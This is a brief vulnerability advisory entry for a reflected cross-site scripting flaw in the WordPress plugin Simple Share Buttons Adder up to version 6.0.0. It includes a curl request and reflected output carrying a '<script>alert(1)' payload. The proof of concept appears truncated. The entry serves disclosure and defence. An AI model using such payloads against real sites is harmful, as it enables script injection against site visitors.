Simple Share Buttons Adder <= 6.0.0 - Reflected Cross-Site Scripting (XSS)

2015-06-02T00:00:00
ID WPVDB-ID:8021
Type wpvulndb
Reporter Lukas Reschke
Modified 2019-11-28T00:00:00

Description

WordPress Vulnerability - Simple Share Buttons Adder <= 6.0.0 - Reflected Cross-Site Scripting (XSS) curl "http://output.com/index.php/2015/06/02/hello-world/?" will result in: <a class="ssba_google_share" href="https://plus.google.com/share?url=http://output.com/2015/06/02/hello-world?<script>alert(1)